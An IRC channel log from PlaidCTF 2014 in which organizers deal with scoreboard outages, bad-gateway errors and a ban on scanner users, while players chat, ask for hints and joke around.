1. Session Start: Fri Apr 11 19:12:15 2014
  2. Session Ident: #pctf
  3. (19:12:15) ••••••••••••••••••••••••••••••••••••••••• ••••• ••• •• •• •• • •
  4. (19:12:15) ••• jOined: (#pctf)
  5. (19:12:15) ••••••••••••••••••••••••••••••••••••••••• ••••• ••• •• •• •• • •
  6. (19:12:15) ••• tOpic: (CTF has started but server is having issues | play.plaidctf.com | HINT: (awreece is a dumbass and we have a problem named zfs))
  7. (19:12:15) ••• sEt by: ([email protected]) on (Friday, April 11th 2014, 16:50:26)
  8. (19:12:15) ••• uSers: 335 users, 1 ops (0%), 8 voiced (2%), 326 regulars (97%)
  9. (19:12:15) ••• sYnc time: (0.14) second(s)
  10. (19:12:15) ••••••••••••••••••••••••••••••••••••••••• ••••• ••• •• •• •• • •
  11. (19:12:29) ••• jOin: (AlephZero) ([email protected])
  12. (19:13:11) ••• jOin: (cyber) ([email protected])
  13. (19:13:21) (mouth`) ec2
  14. (19:13:35) (+tylerni7) CyberPatriots: firewalls where?
  15. (19:13:40) (+tylerni7) our ec2 instances are fine
  16. (19:13:49) (+mserrano) _blasty_: what will be your favorite problem is now open
  17. (19:13:50) (+mserrano) :)
  18. (19:13:53) (+mserrano) glhfdd
  19. (19:13:53) (+tylerni7) lol
  20. (19:13:57) (+cai_) lol
  21. (19:14:07) (_blasty_) ClCOCKFISH!@#
  22. (19:14:08) ••• qUit: (smmalis37) ([email protected]) Remote host closed the connection
  23. (19:14:15) (CyberPatriots) tylerni7: school. I'm at home, it's fine now.
  24. (19:14:22) (+clockish) _blasty_: :)
  25. (19:14:34) (q3k) tylerni7: not reachable from her either. nat.hackerspace.pl, three machines behind it trying to reach the site
  26. (19:14:37) (q3k) *here
  27. (19:15:13) ••• qUit: (Luxerails) ([email protected])
  28. (19:15:23) (spq) not reachable from here: 89.0.54.50
  29. (19:15:33) (AlephZero) everything was fine for me until about 3 minutes ago, getting 504 from nginx now
  30. (19:15:41) (+cai_) AlephZero: yeah noticed
  31. (19:15:45) (+cai_) looking into it
  32. (19:15:47) (+cai_) thanks!
  33. (19:15:52) (Guest77623) I think I've figured out what is going on with webcat-- probably people not the admins keep resetting my password :-(
  34. (19:16:16) ••• jOin: (naam) ([email protected])
  35. (19:16:26) (+tylerni7) Guest77623: heh did you choose name "admin"
  36. (19:16:36) (Valodim) haha
  37. (19:16:45) (Guest77623) No, I used other names.
  38. (19:16:46) (spq) tylerni7: can you unblock us or something?
  39. (19:16:53) (+tylerni7) spq: for main site?
  40. (19:16:56) (AlephZero) cool, thanks for running an awesome challenge :) i'm hitting the sack now (01:17 BST here)
  41. (19:16:58) (+tylerni7) no one is blocked on main site
  42. (19:17:00) (+mserrano) spq: I don't think you were blocked on our side
  43. (19:17:06) (+mserrano) I suspect *we* were blocked on your side
  44. (19:17:08) (+tylerni7) if it's for challenges, pm me
  45. (19:17:15) (+mserrano) unles it's for challenges
  46. (19:17:36) (Phshap) so the challenge for rendezous must be to connect to the service?
  47. (19:17:39) ••• qUit: (r1cky) ([email protected]) Ping timeout: 252 seconds
  48. (19:17:42) (spq) mserrano: why should we block you o_O
  49. (19:17:43) (+houqp) yes
  50. (19:17:48) ••• jOin: (poppopret) ([email protected])
  51. (19:17:58) (asmoday) hmm wallet id
  52. (19:18:00) (+houqp) Phshap: once you loads the page, you see the flag
  53. (19:18:01) (+cai_) yeah the weirdness on main website came back...
  54. (19:18:10) (Phshap) oh! ty
  55. (19:18:14) ••• qUit: (lkwpeter) ([email protected]) Quit: Leaving.
  56. (19:18:16) (spq) i cant ping 54.208.233.50 from here, from other servers i can
  57. (19:18:19) (+mserrano) spq: are you behind a nat?
  58. (19:18:19) (inter) i think i know what to do with rendezvous
  59. (19:18:25) (+mserrano) oh hm is that a probelm
  60. (19:18:27) (inter) but i cant do it gg
  61. (19:18:34) (+houqp) inter: why?
  62. (19:18:37) (+tylerni7) spq: ah okay so challenge server
  63. (19:18:37) (inter) im in dorm
  64. (19:18:38) (+mserrano) no, that's the main site
  65. (19:18:42) (+tylerni7) oh
  66. (19:18:48) (+tylerni7) we haven't blocked anyone from the main site
  67. (19:18:51) (+tylerni7) though... maybe we should
  68. (19:19:04) (spq) hmm
  69. (19:19:22) (spq) we dont block anything o_O
  70. (19:19:56) (+tylerni7) spq: you can pm me and I can look through logs
  71. (19:20:01) (+tylerni7) oh wait you posted the ip
  72. (19:20:03) (+tylerni7) I'll check
  73. (19:20:24) ••• qUit: (eatkinson) ([email protected]) Ping timeout: 240 seconds
  74. (19:20:34) (+tylerni7) spq: I see plenty of successful connections from that IP
  75. (19:20:36) (spq) traceroute 0.po102.esd1.wbr.nac.net last hop
  76. (19:20:59) ••• jOin: (rvpersie) ([email protected])
  77. (19:21:18) (rvpersie) is too late to change the team am on?
  78. (19:21:27) (+tylerni7) rvpersie: no
  79. (19:21:32) (+tylerni7) spq: grep 89.0.54.50 pctf2014.access.log | grep 200 | wc -l
  80. (19:21:32) (+tylerni7) 2889
  81. (19:22:03) (q3k) tylerni7: could you take a look at why nat.hackerspace.pl can't reach the flag server, while q3k.org can?
  82. (19:22:21) (rvpersie) Thanks tylerni7, how do i go about that
  83. (19:22:29) (+tylerni7) rvpersie: stop playing on one team
  84. (19:22:36) (+tylerni7) play on the new one by using their login?
  85. (19:22:41) (poppopret) lol you wanna switch teams?
  86. (19:22:51) (rvpersie) yeah :/
  87. (19:23:19) ••• jOin: (jakemask) ([email protected])
  88. (19:23:25) (+tylerni7) q3k: same thing there, I suspect some people on your NAT are able to hit it or have tabs open
  89. (19:23:31) (CyberPatriots) quick guys, everyone join one team so everyone is a winner!
  90. (19:23:34) (spq) hmm, all ppl from our two hackerspaces(different cities, different infrastructure) cant reach your server, all from other places can
  91. (19:23:47) (+mserrano) that is very strange
  92. (19:24:28) ••• qUit: (Phshap) ([email protected]) Remote host closed the connection
  93. (19:25:20) (wahwah) the main site isn't reachable for us, either
  94. (19:25:29) (+mserrano) just went down
  95. (19:25:36) (fuzyll) aaaaaaaand it's gone
  96. (19:25:47) (+tylerni7) not sure why NATs are really sad
  97. (19:26:06) ••• qUit: (bloup_) (869b5f0a@gateway/web/freenode/ip.134.155.95.10) Ping timeout: 240 seconds
  98. (19:26:23) (iago-x86) All right, time to make dinner and hope somebody hacks together a /simple again :)
  99. (19:26:32) (+tylerni7) my hacky recommendation is to tell everyone to close the shit and have one person use it
  100. (19:27:03) (Sin__) i just want it to load. why doesn't it load?
  101. (19:27:09) ••• qUit: (Drahflow) ([email protected]) Quit: leaving
  102. (19:27:19) ••• jOin: (a13k) (~a13k@unaffiliated/a13k)
  103. (19:27:28) ••• pArt: (Stean) ([email protected])
  104. (19:27:55) (+tylerni7) everyone that says it isn't loading from their nat, as far as I have seen, has at least 1 person loading successfully from their NAT
  105. (19:28:01) (poppopret) wish i dloaded the binary before it went down =/
  106. (19:28:01) ••• jOin: (altf4) ([email protected])
  107. (19:28:10) (Sin__) what binary ?
  108. (19:28:13) (+mserrano) it wasn't a binary
  109. (19:28:15) (a13k) 1 person loading something doesn't mean it's working
  110. (19:28:17) (+tylerni7) my /guess/ is that your NAT has some sort of rate limiting
  111. (19:28:17) (Sin__) no binary
  112. (19:28:20) (jduck) quick, dirbuster on play.plaidctf.com!!
  113. (19:28:20) ••• jOin: (arnrus09) ([email protected])
  114. (19:28:23) (+mserrano) jduck: :|
  115. (19:28:25) ••• jOin: (PHLAK) (~chris@unaffiliated/phlak)
  116. (19:28:25) (jduck) @_@
  117. (19:28:25) (+tylerni7) a13k: but that also means it's not a problem on our end
  118. (19:28:39) (Sin__) i'm not behind a nat and it ain't working at all
  119. (19:28:48) (jduck) yeah its dead here too
  120. (19:28:49) (a13k) tylerni7: is it working for them right now? because it worked for me 5 mins ago
  121. (19:28:49) (+mserrano) Sin__: yes. it just went down. we are bringing it back up
  122. (19:28:55) (a13k) tylerni7: and isn't any more
  123. (19:29:26) (a13k) http://isup.me/play.plaidctf.com
  124. (19:29:39) (Sin__) CTF-hosting-as-a-service
  125. (19:29:48) ••• jOin: (Phshap) ([email protected])
  126. (19:29:56) ••• jOin: (smd) ([email protected])
  127. (19:30:00) ••• qUit: (naam) ([email protected]) Ping timeout: 276 seconds
  128. (19:30:12) (+cai_) the server is currently down btw
  129. (19:30:17) (+cai_) (main website)
  130. (19:30:26) ••• jOin: (r1cky) ([email protected])
  131. (19:31:35) ••• jOin: (jarCrack) ([email protected])
  132. (19:31:36) ••• qUit: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43) Ping timeout: 240 seconds
  133. (19:32:43) ••• qUit: (stach) ([email protected]) Remote host closed the connection
  134. (19:33:20) ••• qUit: (dracu1) ([email protected]) Quit: Leaving.
  135. (19:33:36) ••• qUit: (irctc454) (71e09e85@gateway/web/freenode/ip.113.224.158.133) Ping timeout: 240 seconds
  136. (19:33:53) (poppopret) estimated time frame for when it'll be back up?
  137. (19:34:06) (+tylerni7) not sure...
  138. (19:34:30) (+clockish) _blasty_: Reinhart: did you see my python problem did you see it?
  139. (19:34:30) (+clockish) i like python i like python i like python
  140. (19:34:41) (+tylerni7) clockish: I don't think anyone has been able to see it
  141. (19:34:44) ••• jOin: (solo_) ([email protected])
  142. (19:34:45) (+tylerni7) because server rebooted
  143. (19:34:47) (+tylerni7) etc
  144. (19:34:48) (+clockish) oh
  145. (19:34:49) (Sin__) i saw it
  146. (19:34:51) (+cai_) poppopret: we are trying to replace underlying webserver at the moment
  147. (19:34:54) (Sin__) nightmare, right?
  148. (19:35:01) (poppopret) ok
  149. (19:35:05) (+clockish) Sin__: yeah
  150. (19:35:08) (poppopret) i'll check back in an hour or two
  151. (19:35:12) (gsilvis_) __nightmare__?
  152. (19:35:13) (altf4) There a mirror for any of the challenge files by chance?
  153. (19:35:14) (+mserrano) gsilvis_: yes
  154. (19:35:21) (gsilvis_) we saw it, at least!
  155. (19:35:22) (Sin__) i was so excited to see an pwnable but alas, it's python
  156. (19:35:26) (gsilvis_) danny's enjoying it a lot
  157. (19:35:28) (+clockish) gsilvis_: \o/
  158. (19:35:32) (+mserrano) ;)
  159. (19:35:36) ••• qUit: (jozsefgezabela) (c1e17dfd@gateway/web/freenode/ip.193.225.125.253) Ping timeout: 240 seconds
  160. (19:35:42) ••• jOin: (drc) (768b4983@gateway/web/freenode/ip.118.139.73.131)
  161. (19:35:43) (gsilvis_) I find it highly entertaining, but I don't know shit about that kind of thing
  162. (19:35:49) (+clockish) Sin__: AND WHAT IS WRONG WITH PYTHON??????
  163. (19:35:52) (+mserrano) Sin__: there are binaries in the future
  164. (19:35:57) (+mserrano) just none open yet apparently
  165. (19:36:06) ••• nIck: (drc) is now known as (Guest8491)
  166. (19:36:14) ••• nIck: (Guest8491) is now known as (drc`)
  167. (19:36:28) (drc`) hi all!
  168. (19:36:28) ••• jOin: ([gon]starmie) (8ff8eb9c@gateway/web/freenode/ip.143.248.235.156)
  169. (19:36:35) (robbje) webthingy is slow
  170. (19:36:49) (drc`) just letting you know that we're having no luck connecting to play.plaidctf.com from aus
  171. (19:37:00) (+clockish) drc`: we're currently down
  172. (19:37:05) (+clockish) to make things faster
  173. (19:37:06) (drc`) ah
  174. (19:37:12) (drc`) (Y)
  175. (19:37:17) (Valodim) well, at least we're not alone now
  176. (19:37:23) (+tylerni7) -_-
  177. (19:37:32) (inter) yo tyler
  178. (19:37:36) (inter) what should i get for dinner
  179. (19:37:38) (robbje) Plaid Parliament of Hosting!
  180. (19:37:42) (inter) 1. pizza hut 2. subway 3. pita pit
  181. (19:37:47) ••• jOin: (bob__) (~bob@2607:fe50:0:8102:1b0:9b4c:7953:38cf)
  182. (19:37:53) (+tylerni7) inter: 1 or 3
  183. (19:37:54) ••• jOin: (DooMMasteR) (~DooMMaste@unaffiliated/doommaster)
  184. (19:37:55) (nullProtectorate) SUBWAY
  185. (19:38:03) (+tylerni7) 3 will probably make you feel less shitty
  186. (19:38:10) (+clockish) why choose, get all three!
  187. (19:38:23) (inter) clockish: all 3 will make me feel even worse
  188. (19:38:29) (DooMMasteR) I already feel better knowing the page is completely down :)
  189. (19:38:37) (+clockish) inter: yeah with that attitude it will
  190. (19:38:38) (inter) tylerni7: 3 and a puff should help my mood :D
  191. (19:38:43) (+mserrano) I hate computers
  192. (19:38:46) (DooMMasteR) better then having ones TCP conns rejected
  193. (19:38:47) (+tylerni7) heh
  194. (19:38:55) (+clockish) DooMMasteR++
  195. (19:39:00) ••• jOin: (this_is_a_new_ni) ([email protected])
  196. (19:39:07) (inter) clockish: 1 large pizza, footlong subway, and medium pita
  197. (19:39:18) (inter) #challenge
  198. (19:39:20) (soleblaze) ls
  199. (19:39:20) ••• jOin: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43)
  200. (19:39:24) (this_is_a_new_ni) server is being very flaky
  201. (19:39:28) (drc`) cat flag
  202. (19:39:29) (+tylerni7) yes
  203. (19:39:32) (iago-x86) I had leftover Chinese food :D
  204. (19:39:33) (this_is_a_new_ni) took about 30 mins to just log in
  205. (19:39:38) (+tylerni7) we're working on it...
  206. (19:39:41) (soleblaze) drc`: for reals.
  207. (21:45:27) * Disconnected
  208. Session Close: Fri Apr 11 21:45:28 2014
  209. Session Start: Fri Apr 11 21:45:28 2014
  210. Session Ident: #pctf
  211. (21:45:38) ••• rAw (0) LS account-notify extended-join identify-msg multi-prefix sasl
  212. (21:45:39) ••• rAw (0) ACK multi-prefix
  213. (21:45:39) ••• rAw (265) 5130 12000 Current local users 5130, max 12000
  214. (21:45:39) ••• rAw (266) 80346 95150 Current global users 80346, max 95150
  215. (21:45:39) ••• rAw (250) Highest connection count: 12001 (12000 clients) (25881 connections received)
  216. (21:45:39) -NickServ- This nickname is registered. Please choose a different nickname, or identify via /msg NickServ identify <password>.
  217. (21:45:40) * Attempting to rejoin channel #pctf
  218. (21:45:45) ••••••••••••••••••••••••••••••••••••••••• ••••• ••• •• •• •• • •
  219. (21:45:45) ••• jOined: (#pctf)
  220. (21:45:45) ••••••••••••••••••••••••••••••••••••••••• ••••• ••• •• •• •• • •
  221. (21:45:45) ••• tOpic: (CTF has started but server is having issues | play.plaidctf.com | HINT: (awreece is a dumbass and we have a problem named zfs))
  222. (21:45:45) ••• sEt by: ([email protected]) on (Friday, April 11th 2014, 16:50:26)
  223. (21:45:45) ••• uSers: 356 users, 1 ops (0%), 9 voiced (3%), 346 regulars (97%)
  224. (21:45:45) ••• sYnc time: (0.25) second(s)
  225. (21:45:45) ••••••••••••••••••••••••••••••••••••••••• ••••• ••• •• •• •• • •
  226. (21:45:50) (nextsecu) Oh
  227. (21:45:55) (x_x) Site still having issues?
  228. (21:46:08) ••• qUit: (_bcc) ([email protected]) Ping timeout: 252 seconds
  229. (21:46:15) (+cai_) pwnable is opened
  230. (21:46:30) ••• qUit: (naam) ([email protected]) Ping timeout: 276 seconds
  231. (21:46:30) ••• jOin: (suntzu_II) (b83a0767@gateway/web/freenode/ip.184.58.7.103)
  232. (21:46:30) (_blasty_) 404
  233. (21:46:32) (_blasty_) cai
  234. (21:46:32) (allanlw) 404
  235. (21:46:38) (doom) 404
  236. (21:46:38) (allanlw) tylerni7: ^
  237. (21:46:39) (doom) q_q
  238. (21:46:41) (Anyny0) 404 D=
  239. (21:46:47) (+cai_) q_Q
  240. (21:46:56) (fuzyll) gateway is bad, need more minerals and a probe
  241. (21:47:11) (nextsecu) 404 :(
  242. (21:47:16) (marcan) needs moar cloud
  243. (21:47:21) (+cai_) put 2 at the end of it
  244. (21:47:22) (+cai_) bz2
  245. (21:47:24) (+cai_) instead of bz
  246. (21:47:25) (+tylerni7) lol
  247. (21:47:27) (_blasty_) durr
  248. (21:47:27) (+cai_) we will fix the text
  249. (21:47:29) (_blasty_) 404
  250. (21:47:36) (_blasty_) with bz2
  251. (21:47:42) (conan) 502
  252. (21:47:47) (nextsecu) incoming 502
  253. (21:47:48) (nextsecu) !!
  254. (21:47:59) (juan_) hi, same here 502 error
  255. (21:48:17) (+mserrano) Okay I made a mistake
  256. (21:48:21) (+tylerni7) lol
  257. (21:48:23) (TobalJackson) uh oh
  258. (21:48:24) (x7r0n) does crypto 20 needs a password to be cracked ?
  259. (21:48:25) (nextsecu) CTF pre-qual servers are usually dang shitty
  260. (21:48:28) (TobalJackson) 502 bad gateway?
  261. (21:48:31) (+mserrano) iboth .bz and .bz2 should now be up
  262. (21:48:34) (_blasty_) ok works
  263. (21:48:35) (+mserrano) I just forgot to upload that one
  264. (21:48:35) (+mserrano) sorry
  265. (21:48:40) (+cai_) we are trying to fix 502 errors sorry
  266. (21:48:54) (+cai_) so just refresh for now
  267. (21:49:11) ••• qUit: (factoreal) ([email protected]) Quit: factoreal
  268. (21:49:28) (Anyny0) Working
  269. (21:49:48) (nextsecu) Well this server is a lot better then Codegate 2014 PreQual server so.. yep
  270. (21:50:02) (TobalJackson) I still can't create an account
  271. (21:50:03) ••• jOin: (wooyaggo) ([email protected])
  272. (21:50:16) (+cai_) TobalJackson: is that because of 502 errors?
  273. (21:50:22) (TobalJackson) no i'm on the registration page
  274. (21:50:29) (+cai_) on play.plaidctf.com?
  275. (21:50:31) (TobalJackson) but when i click the "create an account" button
  276. (21:50:37) (TobalJackson) nothing happens
  277. (21:50:40) (+cai_) ah
  278. (21:50:45) (TobalJackson) yeah, on play.plaidctf.com/register
  279. (21:50:50) (+cai_) just trying clicking few times
  280. (21:50:58) (+cai_) it's ajax and probably getting 502s
  281. (21:51:06) (TobalJackson) doh
  282. (21:51:09) (TobalJackson) yeah, 502
  283. (21:51:14) (+cai_) yeah, we are looking into that
  284. (21:51:16) (+cai_) sorry about that
  285. (21:51:23) ••• jOin: (namrog84) ([email protected])
  286. (21:51:23) (TobalJackson) oh sweet
  287. (21:51:26) (TobalJackson) it registered me
  288. (21:51:37) ••• jOin: (acez) ([email protected])
  289. (21:51:43) (+cai_) cool
  290. (21:54:36) ••• qUit: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43) Ping timeout: 240 seconds
  291. (21:54:41) ••• jOin: (patcdr) ([email protected])
  292. (21:55:28) ••• qUit: (dodgyvan_) ([email protected]) Remote host closed the connection
  293. (21:55:33) (robbje) aaand it's gone
  294. (21:56:19) (+ricky) Ugh, sorry, we're bringing up more instantes, but DNS is slow :-(
  295. (21:56:24) ••• qUit: (_simo) ([email protected]) Quit: segfault at 7fff1ebe5000 ip 000000000041274b sp 00007fff1ebe32f8 error 6
  296. (21:57:04) (namrog84) this is my first ctf, and not sure if i missed it somewhere, but can flags have spaces?
  297. (21:57:21) ••• jOin: (cool_guy) ([email protected])
  298. (21:57:30) (cool_guy) why can't i login ?
  299. (21:57:38) (Anyny0) Flags can be anything
  300. (21:57:41) ••• jOin: (n00b13) ([email protected])
  301. (21:57:46) (iago-x86) Question for anybody.. what's the goal of WhatsCat? I have the vuln, but I don't know what to do with it
  302. (21:58:07) ••• qUit: (nonroot) ([email protected]) Ping timeout: 250 seconds
  303. (21:58:13) (Hertz__) find a flag
  304. (21:58:18) (iago-x86) ooh
  305. (21:58:20) (iago-x86) Gotcha! :P
  306. (21:58:29) (chandler1234) iago-x86: the goal is to write a gui interface in visual basic to find the flag
  307. (21:58:32) (+cai_) cool_guy: hmm.. try again, it might be 502'ing which we are trying to fix now
  308. (21:58:50) (cool_guy) ohk
  309. (21:58:56) (+cai_) namrog84: in pctf, there's no key that has spaces
  310. (21:58:57) (+ricky) Hoping things will improve significantly once DNS propagates
  311. (21:59:06) ••• jOin: (naam) ([email protected])
  312. (21:59:26) ••• qUit: (n00b13) ([email protected]) Changing host
  313. (21:59:26) ••• jOin: (n00b13) (~n00b13@unaffiliated/nitsua)
  314. (21:59:38) ••• jOin: (loca) (79a88098@gateway/web/freenode/ip.121.168.128.152)
  315. (21:59:40) (+mserrano) Is anyone from eLoL in here
  316. (21:59:46) ••• jOin: (l0l0l) (932e7f69@gateway/web/freenode/ip.147.46.127.105)
  317. (21:59:54) ••• pArt: (n00b13) (~n00b13@unaffiliated/nitsua)
  318. (21:59:56) ••• jOin: (n00b13) (~n00b13@unaffiliated/nitsua)
  319. (22:00:45) ••• jOin: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43)
  320. (22:00:52) ••• jOin: (CyberPatriots) (60279873@gateway/web/freenode/ip.96.39.152.115)
  321. (22:01:29) (n00b13) any hints for web 1?
  322. (22:01:37) (nextsecu) What is web 1
  323. (22:01:52) (nextsecu) You meaning mtpox?
  324. (22:01:58) (n00b13) yeah
  325. (22:02:01) ••• jOin: (irctc470) (bca2e4da@gateway/web/freenode/ip.188.162.228.218)
  326. (22:02:22) ••• jOin: (HighFiveBell) ([email protected])
  327. (22:02:47) (mischa__) whatscat is down?
  328. (22:02:58) ••• jOin: (dodgyvan) ([email protected])
  329. (22:03:02) (upb) for me aswell
  330. (22:03:04) (HighFiveBell) Are there direct links to the challenges for those having trouble getting to the site? Like last year.
  331. (22:03:05) (Anyny0) yup
  332. (22:03:33) ••• qUit: (ubuntor) ([email protected]) Ping timeout: 245 seconds
  333. (22:03:36) ••• qUit: (CW) (c5062d79@gateway/web/freenode/ip.197.6.45.121) Ping timeout: 240 seconds
  334. (22:03:36) ••• qUit: (amar__) (80edcd12@gateway/web/freenode/ip.128.237.205.18) Ping timeout: 240 seconds
  335. (22:03:38) (ayrx) whatscat looks down to me
  336. (22:03:44) (Anyny0) http://play.plaidctf.com/problems/view/ [id]
  337. (22:04:01) (fuzyll) 6 hours into the competition, and some of us are just now realizing we don't have IDA installed...
  338. (22:04:02) (upb) grrrrrrrrr
  339. (22:04:04) (+ricky) ayrx: Thanks, banned a dirbuster
  340. (22:04:15) (Luffy) youre welcome
  341. (22:04:36) ••• qUit: (irctc621) (81f4f232@gateway/web/freenode/ip.129.244.242.50) Ping timeout: 240 seconds
  342. (22:04:49) ••• qUit: (Hertz__) ([email protected]) Read error: Connection reset by peer
  343. (22:05:12) (+cai_) running dirbuster wouldn't get you anywhere... other than getting banned.. so don't do it :p
  344. (22:05:12) ••• jOin: (SElain) ([email protected])
  345. (22:05:13) (namrog84) cai_ thanks! I got it submitted and it accepted it :D
  346. (22:05:32) (+cai_) namrog84: cool!
  347. (22:05:38) ••• jOin: (Hertz_) ([email protected])
  348. (22:05:41) ••• jOin: (ramsexy) ([email protected])
  349. (22:06:35) (arthurdent) whatscat looks down to me too
  350. (22:06:35) ••• jOin: (ubuntor) ([email protected])
  351. (22:06:48) (xp45g) were you running dirbuster? =P
  352. (22:07:01) (+mserrano) If you ran dirbuster
  353. (22:07:03) (+mserrano) we banned you
  354. (22:07:04) (+mserrano) sorry
  355. (22:07:34) (Luffy) i'm sooooo sorrrry please forgive me!
  356. (22:07:36) ••• qUit: (eastwolf__) (b8bf2376@gateway/web/freenode/ip.184.191.35.118) Ping timeout: 240 seconds
  357. (22:07:38) (Luffy) nah jk
  358. (22:07:39) (+mserrano) lol
  359. (22:07:42) (Luffy) i wasn't one of the onew
  360. (22:07:44) (Luffy) ones*
  361. (22:07:47) ••• qUit: (eatkinson) ([email protected]) Ping timeout: 252 seconds
  362. (22:07:54) (Luffy) i hadnt even heard of dirbuster until today
  363. (22:08:07) ••• jOin: (oiasjd) (45a32320@gateway/web/freenode/ip.69.163.35.32)
  364. (22:08:13) (+mserrano) lol
  365. (22:08:14) ••• qUit: (Ymgve) ([email protected])
  366. (22:08:19) ••• mOde: (ChanServ) sets (+v-v awreece houqp)
  367. (22:08:20) (+ricky) I didn't see anybody from a similar IP here
  368. (22:08:24) (soleblaze) So the solution to web challenges in ctfs isn't to run a web scanner against them on max speed?
  369. (22:08:30) (soleblaze) who knew.
  370. (22:08:32) ••• qUit: (makler2004) ([email protected]) Quit: ChatZilla 0.9.90.1 [Firefox 28.0/20140314220517]
  371. (22:08:56) (Anyny0) x)
  372. (22:09:10) ••• mOde: (ChanServ) sets (+v houqp)
  373. (22:09:15) (+ricky) If 75.187.201.95 is in here, that's why you're banned
  374. (22:09:38) ••• jOin: (frozencemetery) ([email protected])
  375. (22:09:52) (Luffy) um
  376. (22:09:54) ••• qUit: (kris) ([email protected]) Ping timeout: 276 seconds
  377. (22:09:58) (Luffy) phew thats not me
  378. (22:10:17) ••• jOin: (sdghjksg) ([email protected])
  379. (22:10:24) (mischa__) it was up for 3 sec and now down again?
  380. (22:10:30) (Luffy) question
  381. (22:10:38) (Anyny0) Is rendezvous simply cookie "guessing" or is there something else?
  382. (22:10:40) (Luffy) how are you finding out who is using dirbuster?
  383. (22:10:55) (upb) you want to change your user agent?:P
  384. (22:10:56) (+ricky) mischa__: Are you talking about whatscat?
  385. (22:10:57) ••• jOin: (scnarc) ([email protected])
  386. (22:11:02) (+ricky) It seems to be working OK for me
  387. (22:11:02) (mischa__) yes ricky
  388. (22:11:04) (arthurdent) plz2watscat
  389. (22:11:07) (arthurdent) not working for me
  390. (22:11:16) (upb) yep same.. perhaps a smoke break is needed
  391. (22:11:22) (arthurdent) page loads but trying to register, etc
  392. (22:11:25) (+ricky) Not working as in down, or solution not working?
  393. (22:11:25) (arthurdent) no go
  394. (22:11:28) ••• jOin: (chunderstruck1) ([email protected])
  395. (22:11:28) (+ricky) Ah let me try
  396. (22:11:38) (upb) noresponse to http request
  397. (22:11:43) (upb) timing out
  398. (22:11:45) (arthurdent) yeah page loading might just be caching
  399. (22:11:53) (asmoday) no email sent whatacat
  400. (22:13:01) ••• qUit: (dodgyvan) ([email protected])
  401. (22:13:18) (mischa__) ricky: not working as in down
  402. (22:13:19) (+tylerni7) sorry back now
  403. (22:13:22) (+tylerni7) will look at whatscat
  404. (22:13:23) (arthurdent) yeah it's down
  405. (22:13:30) (Anyny0) Hint for rendezvous?
  406. (22:13:32) ••• jOin: (kevin``) ([email protected])
  407. (22:13:59) (altf4) when will superdupercomputer be released? ;)
  408. (22:14:01) ••• qUit: (borski_) (uid11196@gateway/web/irccloud.com/x-xlhtoriywnjyfaot)
  409. (22:14:19) ••• jOin: (thecatbot) ([email protected])
  410. (22:14:27) ••• jOin: (mrsmith) (uid11196@gateway/web/irccloud.com/x-kzvglmufthkyvsgk)
  411. (22:14:31) ••• nIck: (mrsmith) is now known as (mrsmith67)
  412. (22:14:41) (mrsmith67) hint on web150?
  413. (22:14:44) * Disconnected
  414. Session Close: Fri Apr 11 22:14:44 2014
  415. Session Start: Sat Apr 12 00:14:02 2014
  416. Session Ident: #pctf
  417. (00:14:02) ••••••••••••••••••••••••••••••••••••••••• ••••• ••• •• •• •• • •
  418. (00:14:02) ••• jOined: (#pctf)
  419. (00:14:02) ••••••••••••••••••••••••••••••••••••••••• ••••• ••• •• •• •• • •
  420. (00:14:02) ••• tOpic: (CTF has started but server is having issues | play.plaidctf.com | HINT: (awreece is a dumbass and we have a problem named zfs))
  421. (00:14:02) ••• sEt by: ([email protected]) on (Friday, April 11th 2014, 16:50:26)
  422. (00:14:02) ••• uSers: 359 users, 1 ops (0%), 11 voiced (3%), 347 regulars (97%)
  423. (00:14:02) ••• sYnc time: (0.08) second(s)
  424. (00:14:02) ••••••••••••••••••••••••••••••••••••••••• ••••• ••• •• •• •• • •
  425. (00:14:04) (asmoday) yeah my team left me for their girlfriends..my brain gave up hours ago I am so lost its making me consider applying at walmart
  426. (00:14:18) (x_x) Don't do it. It's not worth it.
  427. (00:14:32) (imnottyler) Tylerni7 are you a real hacker?
  428. (00:14:38) (+tylerni7) no
  429. (00:14:50) (imnottyler) im pretty you are!
  430. (00:14:52) (asmoday) I cannot tell what the hell is up with this rsa private key
  431. (00:15:24) (imnottyler) here is the challenge!
  432. (00:15:24) (+tylerni7) bitrot man
  433. (00:15:27) (+tylerni7) it's a terrible thing
  434. (00:15:28) (+clockish_or_tylr) tylerni7 hacked me, and I don't know who I am anymore
  435. (00:15:29) (tylerma7) http://imgur.com/oLeF52U
  436. (00:15:32) (poppopret) is it possible to debug elf files locally in IDA?
  437. (00:15:36) (imnottyler) here is the challenge
  438. (00:15:46) (imnottyler) a big Stegano challenge!
  439. (00:16:41) (UsedOils) Yup Tyler is the real hacker
  440. (00:16:48) (imnottyler) you can submit the flag in pm
  441. (00:16:49) (TYLERVII) wow im excited
  442. (00:17:20) (tylerma7) wow, much challenge, so tough, wow
  443. (00:17:36) ••• nIck: (UsedOils) is now known as (Tylernl7)
  444. (00:17:40) (+tylerni7) poppopret: yeah
  445. (00:17:47) (+tylerni7) it can connect to a gdb server
  446. (00:17:49) (imnottyler) you look pretty good...no?
  447. (00:18:00) ••• pArt: (pseudorandom) ([email protected]) "Leaving"
  448. (00:18:16) (+tylerni7) tylerma7: oh my god
  449. (00:18:18) (+tylerni7) that is the best
  450. (00:18:29) (+tylerni7) <3
  451. (00:18:35) (tylerma7) <3
  452. (00:18:39) (Tylernl7) <3
  453. (00:18:40) (TYLERVII) imnottyler: Its a very good stegano chall
  454. (00:18:49) ••• pArt: (Knightmare91) ([email protected]) "Leaving"
  455. (00:18:51) (imnottyler) 500 points
  456. (00:18:52) (+dickoff) wtf is going on
  457. (00:18:55) (+tylerni7) lol
  458. (00:18:59) (imnottyler) you win the acuvent challenge
  459. (00:19:04) (+clockish_or_tylr) dickoff: we're all tyler
  460. (00:19:06) (+clockish_or_tylr) maybe
  461. (00:19:35) ••• qUit: (ra_) (5d2accbd@gateway/web/freenode/ip.93.42.204.189) Ping timeout: 240 seconds
  462. (00:19:56) (kevin``) is rendezvous down?
  463. (00:20:03) (imnottyler) roll the fucking dice !!!
  464. (00:20:11) (+tylerni7) kevin``: rendezvous has been up the entire game
  465. (00:20:17) (+tylerni7) and you are about the 50th person to ask if it is down
  466. (00:20:20) (+tylerni7) this isn't your fault
  467. (00:20:23) (imnottyler) kevin you wann rendez vous!
  468. (00:20:25) (imnottyler) ?
